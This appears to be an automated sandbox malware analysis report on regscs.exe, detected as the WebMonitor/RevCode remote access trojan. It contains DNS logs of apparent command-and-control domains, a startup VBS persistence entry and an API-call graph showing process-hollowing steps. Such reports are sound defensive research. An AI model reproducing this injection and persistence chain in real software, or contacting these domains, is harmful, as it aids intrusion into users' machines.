                                                            Oct 17, 2024 12:37:46.481390953 CEST5354338114.114.114.114192.168.2.4
                                                            Oct 17, 2024 12:37:46.482877016 CEST5712053192.168.2.4114.114.114.114
                                                            Oct 17, 2024 12:37:46.791703939 CEST5357120114.114.114.114192.168.2.4
                                                            Oct 17, 2024 12:37:48.609683990 CEST53646941.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:48.609761000 CEST53646941.2.4.8192.168.2.4
                                                            Oct 17, 2024 12:37:48.818793058 CEST4982653192.168.2.41.1.1.1
                                                            Oct 17, 2024 12:37:48.836244106 CEST53498261.1.1.1192.168.2.4
                                                            Oct 17, 2024 12:37:48.845738888 CEST49827123192.168.2.4194.58.200.20
                                                            Oct 17, 2024 12:37:49.562891006 CEST12349827194.58.200.20192.168.2.4
                                                            Oct 17, 2024 12:37:49.564217091 CEST5514053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:50.567548037 CEST5514053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:51.567507982 CEST5514053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:53.586507082 CEST5514053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:37:57.583372116 CEST5514053192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:38:01.599688053 CEST6318453192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:38:02.616705894 CEST6318453192.168.2.4185.141.152.26
                                                            Oct 17, 2024 12:38:03.614784956 CEST6318453192.168.2.4185.141.152.26
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Oct 17, 2024 12:37:48.609857082 CEST192.168.2.41.2.4.8c54d(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Oct 17, 2024 12:36:20.587080002 CEST192.168.2.41.1.1.10xe279Standard query (0)sdns.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:20.725343943 CEST192.168.2.41.1.1.10xcf70Standard query (0)ntp.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:21.509265900 CEST192.168.2.4185.141.152.260x74e1Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:22.533879995 CEST192.168.2.4185.141.152.260x74e1Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:23.547190905 CEST192.168.2.4185.141.152.260x74e1Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:25.551852942 CEST192.168.2.4185.141.152.260x74e1Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:29.551846027 CEST192.168.2.4185.141.152.260x74e1Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:34.339534998 CEST192.168.2.4185.141.152.260x2fd9Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:35.351449966 CEST192.168.2.4185.141.152.260x2fd9Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:36.348685980 CEST192.168.2.4185.141.152.260x2fd9Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:38.348716974 CEST192.168.2.4185.141.152.260x2fd9Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:42.364634991 CEST192.168.2.4185.141.152.260x2fd9Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:42.949495077 CEST192.168.2.4185.141.152.260x5181Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:43.958719969 CEST192.168.2.4185.141.152.260x5181Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:45.026626110 CEST192.168.2.4185.141.152.260x5181Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:46.381371975 CEST192.168.2.4185.141.152.260x896bStandard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:47.020767927 CEST192.168.2.4185.141.152.260x5181Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:47.402045012 CEST192.168.2.4185.141.152.260x896bStandard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:48.411377907 CEST192.168.2.4185.141.152.260x896bStandard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:50.411134958 CEST192.168.2.4185.141.152.260x896bStandard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:51.036380053 CEST192.168.2.4185.141.152.260x5181Standard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:54.411277056 CEST192.168.2.4185.141.152.260x896bStandard query (0)2aa4ccb27ab65b064eae52e993d5dbff.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:00.192275047 CEST192.168.2.41.2.4.80xea98Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:00.590186119 CEST192.168.2.41.2.4.80xf637Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:01.598738909 CEST192.168.2.41.2.4.80xf637Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:03.541316986 CEST192.168.2.4114.114.114.1140xe499Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:04.065403938 CEST192.168.2.4114.114.114.1140x83d4Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:06.336577892 CEST192.168.2.41.1.1.10x710cStandard query (0)oryadshow.wm01.toA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:07.154660940 CEST192.168.2.4185.141.152.260x952fStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:08.145558119 CEST192.168.2.4185.141.152.260x952fStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:09.161195040 CEST192.168.2.4185.141.152.260x952fStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:11.162712097 CEST192.168.2.4185.141.152.260x952fStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:15.176798105 CEST192.168.2.4185.141.152.260x952fStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:19.177800894 CEST192.168.2.4185.141.152.260x16c2Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:20.192552090 CEST192.168.2.4185.141.152.260x16c2Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:21.208143950 CEST192.168.2.4185.141.152.260x16c2Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:23.223731995 CEST192.168.2.4185.141.152.260x16c2Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:27.239564896 CEST192.168.2.4185.141.152.260x16c2Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:32.994116068 CEST192.168.2.41.2.4.80xa94cStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:33.989332914 CEST192.168.2.41.2.4.80xa94cStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:35.330679893 CEST192.168.2.41.2.4.80xa94cStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:37.344841003 CEST192.168.2.41.2.4.80xa94cStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:41.348963976 CEST192.168.2.41.2.4.80xa94cStandard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:44.214549065 CEST192.168.2.41.2.4.80x2b37Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:46.163115025 CEST192.168.2.4114.114.114.1140xc577Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:46.482877016 CEST192.168.2.4114.114.114.1140x8e45Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:48.818793058 CEST192.168.2.41.1.1.10x5597Standard query (0)oryadshow.wm01.toA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:49.564217091 CEST192.168.2.4185.141.152.260x36a0Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:50.567548037 CEST192.168.2.4185.141.152.260x36a0Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:51.567507982 CEST192.168.2.4185.141.152.260x36a0Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:53.586507082 CEST192.168.2.4185.141.152.260x36a0Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:57.583372116 CEST192.168.2.4185.141.152.260x36a0Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:38:01.599688053 CEST192.168.2.4185.141.152.260xad8Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:38:02.616705894 CEST192.168.2.4185.141.152.260xad8Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:38:03.614784956 CEST192.168.2.4185.141.152.260xad8Standard query (0)ee01439035b99fed4b57e5bd255d5faa.seA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Oct 17, 2024 12:36:20.713251114 CEST1.1.1.1192.168.2.40xe279No error (0)sdns.se185.141.152.26A (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:36:20.763101101 CEST1.1.1.1192.168.2.40xcf70No error (0)ntp.se194.58.200.20A (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:00.588907003 CEST1.2.4.8192.168.2.40xea98Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:01.808985949 CEST1.2.4.8192.168.2.40xf637Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:04.064342976 CEST114.114.114.114192.168.2.40xe499Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:04.308197975 CEST114.114.114.114192.168.2.40x83d4Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:06.431488991 CEST1.1.1.1192.168.2.40x710cName error (3)oryadshow.wm01.tononenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:44.213418961 CEST1.2.4.8192.168.2.40xa94cName error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:44.213443041 CEST1.2.4.8192.168.2.40xa94cName error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:44.416883945 CEST1.2.4.8192.168.2.40x2b37Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:46.481390953 CEST114.114.114.114192.168.2.40xc577Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:46.791703939 CEST114.114.114.114192.168.2.40x8e45Name error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:48.609683990 CEST1.2.4.8192.168.2.40xa94cName error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:48.609761000 CEST1.2.4.8192.168.2.40xa94cName error (3)ee01439035b99fed4b57e5bd255d5faa.senonenoneA (IP address)IN (0x0001)false
                                                            Oct 17, 2024 12:37:48.836244106 CEST1.1.1.1192.168.2.40x5597Name error (3)oryadshow.wm01.tononenoneA (IP address)IN (0x0001)false

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:06:35:58
                                                            Start date:17/10/2024
                                                            Path:C:\Users\user\Desktop\regscs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\regscs.exe"
                                                            Imagebase:0x400000
                                                            File size:1'294'848 bytes
                                                            MD5 hash:FE4001F3584462A292BFF67B021A7337
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Revcoderat_8e6d4182, Description: unknown, Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_RevCodeRAT, Description: Detects RevCode/WebMonitor RAT, Source: 00000000.00000002.1826479164.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, Author: ditekSHen
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:06:36:12
                                                            Start date:17/10/2024
                                                            Path:C:\Users\user\Desktop\regscs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\regscs.exe"
                                                            Imagebase:0x400000
                                                            File size:1'294'848 bytes
                                                            MD5 hash:FE4001F3584462A292BFF67B021A7337
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:5
                                                            Start time:06:36:22
                                                            Start date:17/10/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcreg.exe.vbs"
                                                            Imagebase:0x7ff6c6af0000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:06:36:22
                                                            Start date:17/10/2024
                                                            Path:C:\Users\user\Desktop\regscs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\regscs.exe"
                                                            Imagebase:0x400000
                                                            File size:1'294'848 bytes
                                                            MD5 hash:FE4001F3584462A292BFF67B021A7337
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:06:36:34
                                                            Start date:17/10/2024
                                                            Path:C:\Users\user\Desktop\regscs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\regscs.exe"
                                                            Imagebase:0x400000
                                                            File size:1'294'848 bytes
                                                            MD5 hash:FE4001F3584462A292BFF67B021A7337
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:22.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:13.6%
                                                              Total number of Nodes:162
                                                              Total number of Limit Nodes:13
                                                              execution_graph 1017 4b974e 1018 4b975c 1017->1018 1021 4ba4a9 NtQueryInformationProcess 1018->1021 1023 4b8a17 1018->1023 1022 4b8bb9 1021->1022 1022->1018 1024 4b8a1d 1023->1024 1025 4b8a26 NtQueryInformationProcess 1023->1025 1024->1025 1026 4bccab 1025->1026 1026->1018 1027 4bcc43 1028 4bcc4b 1027->1028 1029 4bcc57 Wow64SetThreadContext 1027->1029 1028->1029 1173 4b855b 1174 4b856e VirtualAlloc 1173->1174 1139 4b8a59 1140 4b8a68 1139->1140 1141 4b8a7b 1140->1141 1142 4bc00f ExitProcess 1140->1142 1049 4bb85d VirtualAlloc 1050 4bbd95 1049->1050 1051 4b825d 1052 4b826e CreateProcessW 1051->1052 1053 4bd3b9 1052->1053 1158 4bbedd VirtualAlloc 1054 4bb55c Wow64GetThreadContext 1055 4bb573 1054->1055 1056 4b8451 1059 4b8575 1056->1059 1057 4bbee3 VirtualAlloc 1058 4babd4 1059->1057 1059->1058 1159 4b96d4 1160 4ba487 VirtualAlloc 1159->1160 1162 4bb949 1160->1162 1073 4b83ea VirtualAlloc 1074 4b840a 1073->1074 1075 4b9f80 VirtualFree 1074->1075 1076 4bc74c 1075->1076 1086 4b9de8 1087 4bbdc7 1086->1087 1088 4b884e NtMapViewOfSection 1087->1088 1089 4bb83d NtMapViewOfSection 1087->1089 1088->1087 1089->1087 1090 4b9fe8 1095 4bd2eb 1090->1095 1092 4b9ff7 1093 4bc00f ExitProcess 1092->1093 1094 4b8bc5 1092->1094 1096 4bd2f1 VirtualAlloc 1095->1096 1097 4ba81b 1096->1097 1097->1092 1212 4b81ec 1215 4b81f8 1212->1215 1213 4bbee3 VirtualAlloc 1214 4babd4 1215->1213 1215->1214 1143 4b9660 1144 4ba230 1143->1144 1145 4ba249 LoadLibraryA 1144->1145 1146 4bb2ef 1145->1146 1104 4bd77a 1105 4bd78c SetFilePointer 1104->1105 1106 4bd784 1104->1106 1106->1105 1147 4bba7a 1148 4bba7d CreateFileW 1147->1148 1150 4bd5df 1148->1150 1150->1150 1128 4bda78 1129 4bda7a 1128->1129 1130 4bda80 NtUnmapViewOfSection 1129->1130 1131 4bda87 1129->1131 1130->1131 1137 4b9670 NtCreateSection 1138 4bc070 1137->1138 1151 4bd275 1153 4bd281 1151->1153 1152 4bd2f1 VirtualAlloc 1154 4ba81b 1152->1154 1153->1152 1154->1154 1013 4bb088 1014 4bb09b 1013->1014 1016 4bc7c7 CallWindowProcW 1014->1016 1030 4bcb87 1031 4bcb8a 1030->1031 1032 4bcb73 1030->1032 1035 4b884e 1032->1035 1037 4bb83d 1032->1037 1036 4bb83f NtMapViewOfSection 1035->1036 1038 4bb83f NtMapViewOfSection 1037->1038 1039 4bca98 1040 4bcaae DeleteFileW 1039->1040 1041 4bcac7 1040->1041 1044 4ba183 1041->1044 1045 4bba7b CreateFileW 1044->1045 1047 4bd5df 1045->1047 1047->1047 1229 4ba99f 1230 4ba9ad SetFilePointer 1229->1230 1048 4ba51e WriteFile CloseHandle 1155 4bc01d 1156 4bcc51 Wow64SetThreadContext 1155->1156 1060 4bb617 1061 4b8a68 1060->1061 1062 4b8a7b 1061->1062 1063 4bc00f ExitProcess 1061->1063 1180 4bdd16 1181 4bdd18 1180->1181 1182 4bddfc 1181->1182 1183 4bdd9d VirtualAlloc 1181->1183 1183->1182 1184 4bddba 1183->1184 1185 4bddc6 VirtualFree 1184->1185 1186 4bddd8 1185->1186 1186->1182 1187 4bde1c VirtualAlloc 1186->1187 1187->1182 1188 4bde39 1187->1188 1189 4bde4c VirtualFree 1188->1189 1191 4bde62 1189->1191 1190 4bdecf SleepEx 1190->1191 1191->1182 1191->1190 1192 4b8130 VirtualProtectEx 1191->1192 1192->1191 1070 4ba094 VirtualAlloc 1071 4b9fb9 1070->1071 1071->1070 1072 4bda91 1071->1072 1170 4bc4aa 1171 4ba183 CreateFileW 1170->1171 1172 4bc4bb 1171->1172 1077 4bd0a9 1078 4bbec9 1077->1078 1079 4bd0bd 1078->1079 1080 4bc00f ExitProcess 1078->1080 1079->1079 1081 4bb328 1082 4b975c 1081->1082 1083 4bb337 1081->1083 1084 4ba4a9 NtQueryInformationProcess 1082->1084 1085 4b8a17 NtQueryInformationProcess 1082->1085 1083->1083 1084->1082 1085->1082 1193 4bad28 1194 4bbec9 1193->1194 1195 4bc00f ExitProcess 1194->1195 1196 4bd0bd 1194->1196 1196->1196 1098 4ba226 1099 4ba230 1098->1099 1100 4ba249 LoadLibraryA 1099->1100 1101 4bb2ef 1100->1101 1102 4ba125 VirtualFree 1103 4bb8c7 1102->1103 1197 4b9925 1198 4b9929 1197->1198 1199 4bda80 NtUnmapViewOfSection 1198->1199 1200 4bda87 1198->1200 1199->1200 1107 4bdf3a 1108 4bdf4a 1107->1108 1109 4bdf45 1107->1109 1111 4bdd18 1109->1111 1112 4bdd47 1111->1112 1113 4bddfc 1112->1113 1114 4bdd9d VirtualAlloc 1112->1114 1113->1108 1114->1113 1115 4bddba 1114->1115 1116 4bddc6 VirtualFree 1115->1116 1117 4bddd8 1116->1117 1117->1113 1118 4bde1c VirtualAlloc 1117->1118 1118->1113 1119 4bde39 1118->1119 1120 4bde4c VirtualFree 1119->1120 1121 4bde62 1120->1121 1121->1113 1122 4bdecf SleepEx 1121->1122 1124 4b8130 1121->1124 1122->1121 1125 4b813e VirtualProtectEx 1124->1125 1126 4b8153 1124->1126 1125->1126 1127 4bb139 VirtualAlloc 1132 4b84bf 1133 4bcf6f NtResumeThread 1132->1133 1134 4bb933 1135 4bb935 VirtualAlloc 1134->1135 1136 4bb949 1135->1136
                                                              APIs
                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 004BDA84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: SectionUnmapView
                                                              • String ID:
                                                              • API String ID: 498011366-0
                                                              • Opcode ID: 5737cda7caa6160263ce0f34cf477380f99015675d280388a74db60fb22eb9bd
                                                              • Instruction ID: ec5bb0ca97f6b343b426973eb3bb5d060ce9aa77bdb553a8de1bf2d6d7cb8fb9
                                                              • Opcode Fuzzy Hash: 5737cda7caa6160263ce0f34cf477380f99015675d280388a74db60fb22eb9bd
                                                              • Instruction Fuzzy Hash: 9BD0123080CA45FFC7155B90C9458EABBB4FF193147114CC2E54294450C729BD11EB35
                                                              APIs
                                                              • NtMapViewOfSection.NTDLL(?,?), ref: 004BB845
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: SectionView
                                                              • String ID:
                                                              • API String ID: 1323581903-0
                                                              • Opcode ID: 057339c4d6731164af3514b262df0940dc9cf6616e37506aa80643c6a0f05fa8
                                                              • Instruction ID: 2849a24b6a7d72f7ab787584e48b3dca02c3674f44555c09283ca927d2ece0f5
                                                              • Opcode Fuzzy Hash: 057339c4d6731164af3514b262df0940dc9cf6616e37506aa80643c6a0f05fa8
                                                              • Instruction Fuzzy Hash: EAC00231108244EFCF06AF14C8549E83B75BF05300B1695A2F5199B526C379AA65EBA6
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: CreateSection
                                                              • String ID:
                                                              • API String ID: 2449625523-0
                                                              • Opcode ID: 5669ccf2e1b7a8374bc76f2b2e898166adfdfcc2203c29c201caf0a3bd8b1bae
                                                              • Instruction ID: dccf6b28bb19772e2937099296e85013d80e9835d6aaa4401e36b418e5d61c30
                                                              • Opcode Fuzzy Hash: 5669ccf2e1b7a8374bc76f2b2e898166adfdfcc2203c29c201caf0a3bd8b1bae
                                                              • Instruction Fuzzy Hash: 9AB01231340102CBC74D0234549B7A520941702209F0400BB7023D14E0CE00C8008502
                                                              APIs
                                                              • NtUnmapViewOfSection.NTDLL(?,?), ref: 004BDA84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: SectionUnmapView
                                                              • String ID:
                                                              • API String ID: 498011366-0
                                                              • Opcode ID: 44ee1da29a652fd04cb5752c90f7d82a27d382dc6a9d1d9551aa16aa3d8c1411
                                                              • Instruction ID: 6f23298420f3bc0e38b9bb3211310361d32e75d268302616b9ccda995d476567
                                                              • Opcode Fuzzy Hash: 44ee1da29a652fd04cb5752c90f7d82a27d382dc6a9d1d9551aa16aa3d8c1411
                                                              • Instruction Fuzzy Hash: 2FC09232508A09EFDF128B90C8488FEBB7AFF48304B100891F64265460C77ABD21AB75
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: bf3e07c49c6b17d9d38d816fcbb7b518b53d4b2ee79006393b686a426149cfe1
                                                              • Instruction ID: d261481e8ba8f875883dd8ff52e6cd3191d545f009d43dcc63e100fe1204f119
                                                              • Opcode Fuzzy Hash: bf3e07c49c6b17d9d38d816fcbb7b518b53d4b2ee79006393b686a426149cfe1
                                                              • Instruction Fuzzy Hash: 30C0923150841AEFCF804F64C8D46ECB77BBF09305F10817AE11AA9924CB386451EF66
                                                              APIs
                                                              • NtMapViewOfSection.NTDLL(?,?), ref: 004BB845
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID: SectionView
                                                              • String ID:
                                                              • API String ID: 1323581903-0
                                                              • Opcode ID: e7492d92574e26c8732fac88902880ce7d0fe9e6801a68fe6aec94ede1a2988b
                                                              • Instruction ID: cc0846909bfa5a68313b7a38928b1fd6318c3f281d7342dbb6c2deceaf9634df
                                                              • Opcode Fuzzy Hash: e7492d92574e26c8732fac88902880ce7d0fe9e6801a68fe6aec94ede1a2988b
                                                              • Instruction Fuzzy Hash: 9AB09231000004EFCF055F50C848EEC3B32BF08300F1581A0F4298A02183329420EB22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1825812592.00000000004B8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B8000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b8000_regscs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ebe36bbcbb0e47d8823376c7dc840094feeb4dda5d4581a202c08c961ecfdd4
                                                              • Instruction ID: f6646da48d4ad65943a6f0c14e815708a39e8fa8ca33924092480f0535b9315d
                                                              • Opcode Fuzzy Hash: 1ebe36bbcbb0e47d8823376c7dc840094feeb4dda5d4581a202c08c961ecfdd4
